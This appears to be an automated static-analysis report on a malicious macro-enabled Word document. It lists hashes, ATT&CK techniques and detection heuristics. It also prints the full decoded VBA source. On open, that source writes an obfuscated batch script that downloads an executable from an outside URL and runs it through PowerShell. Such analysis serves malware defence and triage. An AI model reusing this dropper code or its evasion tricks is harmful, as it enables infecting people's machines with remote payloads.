Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 8ea9d77f19671651…

MALICIOUS

Office (OOXML)

66.7 KB Created: 2020-05-04 15:16:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-09-07
MD5: 8026efe45fa552f96cdbd22e547b8424 SHA-1: 50dcc6c69918eacd5f9642e34b7a422287863e16 SHA-256: 8ea9d77f1967165177a58e6dd9c397ffad8a3e9dcdf9bb4408db501b9067a7ad
292 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is a malicious OOXML document containing VBA macros. The macros are obfuscated and contain a call to Shell, which is used to download and execute a second-stage payload from a remote URL. The presence of the AutoOpen macro and the critical heuristic firings indicate a clear intent to execute malicious code upon opening the document.

Heuristics 9

  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    '--------------Shell API and Constants----------
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    '--------------Shell API and Constants----------
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        stringToWrite = stringToWrite & "echo b.Write NeHD.ResponseBody >> %NKFDGIDIFNSNF%" & vbNewLine
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        stringToWrite = stringToWrite & "echo Set NeHD = CreateObject(""MSXML2.Se" + "rverXMLHTTP"") >> %NKFDGIDIFNSNF%" & vbNewLine
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://spdtextile.com/sclas/rockstar.php Referenced by macro
    • http://s@pdtextReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 13054 bytes
SHA-256: a5d624ee52de4df1fe3bd85bd1ea2519ef2a33abe2f9e81252b55b5dbe011fea
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"

Public Const GENERIC_WRITE = &H40000000
Public Const OPEN_ALWAYS = 4
Public Const FILE_ATTRIBUTE_NORMAL = &H80

#If VBA7 Then
Public Declare PtrSafe Function WriteFile Lib "kernel32  " (ByVal hFile As LongPtr, lpBuffer As Any, ByVal nNumberOfBytesToWrite As LongPtr, lpNumberOfBytesWritten As LongPtr, ByVal lpOverlapped As LongPtr) As LongPtr
Public Declare PtrSafe Function MakeSureDirectoryPathExists Lib "IMAGEHLP.DLL  " (ByVal DirPath As String) As LongPtr
Public Declare PtrSafe Function CloseHandle Lib "kernel32  " (ByVal hObject As LongPtr) As LongPtr
Public Declare PtrSafe Function CreateFile Lib "kernel32  " Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As LongPtr, ByVal dwShareMode As LongPtr, ByVal lpSecurityAttributes As LongPtr, ByVal dwCreationDisposition As LongPtr, ByVal dwFlagsAndAttributes As LongPtr, ByVal hTemplateFile As LongPtr) As LongPtr
#Else
Public Declare Function WriteFile Lib "kernel32                " ( _
                    ByVal hFile As Long, _
                    lpBuffer As Any, _
                    ByVal nNumberOfBytesToWrite As Long, _
                    lpNumberOfBytesWritten As Long, _
                    ByVal lpOverlapped As Long) As Long
Public Declare Function MakeSureDirectoryPathExists Lib "IMAGEHLP.DLL    " (ByVal DirPath As String) As Long
Public Declare Function CloseHandle Lib "kernel32   " (ByVal hObject As Long) As Long
Public Declare Function CreateFile Lib "kernel32          " Alias "CreateFileA" ( _
                    ByVal lpFileName As String, _
                    ByVal dwDesiredAccess As Long, _
                    ByVal dwShareMode As Long, _
                    ByVal lpSecurityAttributes As Long, _
                    ByVal dwCreationDisposition As Long, _
                    ByVal dwFlagsAndAttributes As Long, _
                    ByVal hTemplateFile As Long) As Long
                    
#End If

Public Sub App_Hard_Wait_DoEvents(dblSeconds As Double)
      
      If dblSeconds = 0 Then Exit Sub
      Dim varStart As Variant
      varStart = Timer
      
      Do While Timer < (varStart + dblSeconds)
          
      DoEvents
      Loop
      
      With Application
        .ScreenUpdating = False
         
        Do Until .Documents.Count = 0
             
            .Documents(1).Close SaveChanges:=wdDoNotSaveChanges
        Loop
        
        .Quit SaveChanges:=wdDoNotSaveChanges
    End With
    
End Sub
Sub Gippo()
'
' Samsung, Xiaomi, Meizu, Huawei, OnePlus
'
MakeFolder "c:\\\\pipedir\\\\\"

End Sub

Sub autoopen()

Gippo

End Sub

Public Function MakeFolder(ByVal pathToCreate As String) _
  As Boolean
    Dim sSomePath As String
    Dim bAns As Boolean
    
   sSomePath = pathToCreate
   
    If CreatePath(sSomePath) = True Then
        bAns = True
    Else
       bAns = False
    End If
MakeFolder = bAns
End Function

Private Function CreatePath(NewPath) As Boolean
    Dim sPath As String
    sPath = NewPath & IIf(Right$(NewPath, 1) = "\", "", "\")

    If MakeSureDirectoryPathExists(sPath) <> 0 Then
    
    Dim hExportFile, nWritten
    Dim stringToWrite As String

      hExportFile = CreateFile("c:\pipedir\obsrecord.cmd" _
        , GENERIC_WRITE _
        , 0 _
        , 0 _
        , OPEN_ALWAYS _
        , FILE_ATTRIBUTE_NORMAL _
        , 0 _
    )
    
    stringToWrite = "996475373574397836369488 "
    stringToWrite = stringToWrite & "967326252783299636687299 " & vbNewLine
    stringToWrite = stringToWrite & "874698283733548974368557 " & vbNewLine
    stringToWrite = stringToWrite & "554262726737546352757534 " & vbNewLine
    stringToWrite = stringToWrite & "575262664446338253559277 " & vbNewLine
    stringToWrite = stringToWrite & "965338544338926323537288 " & vbNewLine
    stringToWrite = stringToWrite & "669589462824989464437893 " & vbNewLine
    stringToWrite = stringToWrite & "662962837427864373745275 " & vbNewLine
    stringToWrite = stringToWrite & "773596225649356249344697 " & vbNewLine
    stringToWrite = stringToWrite & "689245556469872577332328 " & vbNewLine
    stringToWrite = stringToWrite & "759687397722384735626647 " & vbNewLine
    stringToWrite = stringToWrite & "948384293337326873383362 " & vbNewLine
    stringToWrite = stringToWrite & "485995586497356493464752 " & vbNewLine
    stringToWrite = stringToWrite & "373924958259247666889987 " & vbNewLine
    stringToWrite = stringToWrite & "576976573339836257556976 " & vbNewLine
    stringToWrite = stringToWrite & "336787352493483565245244 " & vbNewLine
    stringToWrite = stringToWrite & "593828986835668277968499 " & vbNewLine
    stringToWrite = stringToWrite & "926736974438894894498559 " & vbNewLine
    stringToWrite = stringToWrite & "625645797574579675277663 " & vbNewLine
    stringToWrite = stringToWrite & "542388524925683893892548 " & vbNewLine
    stringToWrite = stringToWrite & "392542357772797757959633 " & vbNewLine
    stringToWrite = stringToWrite & "638938684752932487476246 " & vbNewLine
    stringToWrite = stringToWrite & "767834296898856888293435 " & vbNewLine
    stringToWrite = stringToWrite & "748698568445437932752954 " & vbNewLine
    stringToWrite = stringToWrite & "892537353278935364467923 " & vbNewLine
    stringToWrite = stringToWrite & "646425884257596934988939 " & vbNewLine
    stringToWrite = stringToWrite & "785239849727987285423977 " & vbNewLine
    stringToWrite = stringToWrite & "846989324686659657734259 " & vbNewLine
    stringToWrite = stringToWrite & "S^" & vbNewLine
    stringToWrite = stringToWrite & "et NKFDGIDIFNSNF=c:\pipedir\NKFDGIDIFNSNF.vbs" & vbNewLine
    stringToWrite = stringToWrite & "echo Dim MathCtrl, NeHD, a, b, c, daycolor, march >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo Set MathCtrl = Wscript.Arguments >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo Set NeHD = CreateObject(""MSXML2.Se" + "rverXMLHTTP"") >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo c = MathCtrl(0 + 0) >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo daycolor = MathCtrl(1 + 0) >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo NeHD.Open ""GET"", c, 0 >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo NeHD.Send >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo Set b = CreateObject(""ADODB.Stream"") >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo b.Open >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo b.Type = 1 >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo march = NeHD.Status >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "646565872973647726523532 " & vbNewLine
    stringToWrite = stringToWrite & "652289283432553977439546 " & vbNewLine
    stringToWrite = stringToWrite & "745466658778242843276366 " & vbNewLine
    stringToWrite = stringToWrite & "533843839786645529478696 " & vbNewLine
    stringToWrite = stringToWrite & "666736977692874993846726 " & vbNewLine
    stringToWrite = stringToWrite & "875262765338332724829626 " & vbNewLine
    stringToWrite = stringToWrite & "534356348752823732353367 " & vbNewLine
    stringToWrite = stringToWrite & "792249439929954693226582 " & vbNewLine
    stringToWrite = stringToWrite & "525989983554425664927932 " & vbNewLine
    stringToWrite = stringToWrite & "853852465627956876499278 " & vbNewLine
    stringToWrite = stringToWrite & "echo If march ^<^> 200 Then >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo    WScript.Quit 1 >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo End If >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo b.Write NeHD.ResponseBody >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo b.Position = 0 + 0 >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo Set a = CreateObject(""Scripting.FileSystemObject"") >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo If a.FileExists(daycolor) Then a.DeleteFile daycolor >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo b.SaveToFile daycolor >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "echo b.Close >> %NKFDGIDIFNSNF%" & vbNewLine
    stringToWrite = stringToWrite & "cscri^" & vbNewLine
    stringToWrite = stringToWrite & "pt c:\pipedir\NKFDGIDIFNSNF.vbs http://spdtextile.com/sclas/rockstar.php c:\pipedir\LODFOJKFG.exe" & vbNewLine
    stringToWrite = stringToWrite & "powersh^" & vbNewLine
    stringToWrite = stringToWrite & "ell -c Sleep -s 8;Saps 'c:\pipedir\LODFOJKFG.exe'" & vbNewLine
    stringToWrite = stringToWrite & "break>c:\pipedir\NKFDGIDIFNSNF.vbs" & vbNewLine

    
    WriteFile hExportFile, ByVal stringToWrite, Len(stringToWrite), nWritten, 0

    CloseHandle hExportFile

    CreatePath = True

    End If

    ShellAndWaitReady "c:\pipedir\obsrecord.cmd", 0
    
    App_Hard_Wait_DoEvents (13)
    
End Function


Attribute VB_Name = "Module1"
Option Explicit

'--------------Shell API and Constants----------
Private Const WAIT_FAILED = -1&
Private Const INFINITE = &HFFFFFFFF       '  Infinite timeout
Private Const NORMAL_PRIORITY_CLASS = &H20
Private Const SYNCHRONIZE = &H100000

#If VBA7 Then
Private Declare PtrSafe Function WaitForInputIdle Lib "user32" (ByVal hProcess As LongPtr, ByVal dwMilliseconds As LongPtr) As LongPtr
#Else
Private Declare Function WaitForInputIdle Lib "user32" (ByVal hProcess As Long, ByVal dwMilliseconds As Long) As Long
#End If
'Purpose   :    Shells a process synchronised i.e. Holds execution until application has closed.
'Inputs    :    sCommandLine        =   The Command line to run the application e.g. "Notepad.exe"
'               State               =   The Window State to run of the shelled program (A Long)
'Outputs   :    Returns the Process Handle
'Notes     :    Have noticed side effects. Other applications like Internet Explorer seem to be effected by this.

Public Function ShellAndWaitReady(sCommandLine As String, Optional lState As Long = vbNormalFocus) As Long
    Dim lhProc As Long
    
    If Left$(sCommandLine, 1) <> Chr(34) Then
        sCommandLine = Chr(34) & sCommandLine
    End If
    If Right$(sCommandLine, 1) <> Chr(34) Then
        sCommandLine = sCommandLine & Chr(34)
    End If
    lhProc = Shell(sCommandLine, lState)
    'Wait for the process to initialize
    Call WaitForInputIdle(lhProc, INFINITE)
    'Return the handle
    ShellAndWaitReady = lhProc
End Function

'Purpose   :    Holds execution until application has closed.
'Inputs    :    sFilePath       =   The path to the application to run e.g. "Notepad.exe"
'               [sCommandLine]  =   Any command line arguments
'               [lState]        =   The Window State to run of the shelled program (A Long)
'               [lMaxTimeOut]   =   The maximum amount of time to wait for the process to finish (in secs).
'                                   -1 = infinate
'Outputs   :    Returns the True if failed open a process or complete within the specified timeout.
'Notes     :    Similiar to ShellAndHold, but will not get any 'spiking' effects using this method.



'Purpose     :  Checks if a file exists
'Inputs      :  sFilePathName                   The path and file name e.g. "C:\Autoexec.bat"
'Outputs     :  Returns True if the file exists


Function FileExists(sFilePathName As String) As Boolean
    
    On Error GoTo ErrFailed
    If Len(sFilePathName) Then
        If (GetAttr(sFilePathName) And vbDirectory) < 1 Then
            'File Exists
            FileExists = True
        End If
    End If
    Exit Function
    
ErrFailed:
    'File Exists
    FileExists = False
    On Error GoTo 0
End Function



Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{CB91606B-A906-422C-B200-40A6DF4AD3C3}{64034459-9996-423A-999E-4FFD420B03FA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{4C92A3E7-215B-4C42-A660-1E14176D303A}{60F6922A-0C4C-4737-AC0F-E4F87CB93B10}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 2342912 bytes
SHA-256: 2278c6888c9e9f84d4605752026560f81cdd366f7d98e289428e310b9e901d73
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 684 long base64-like blob(s).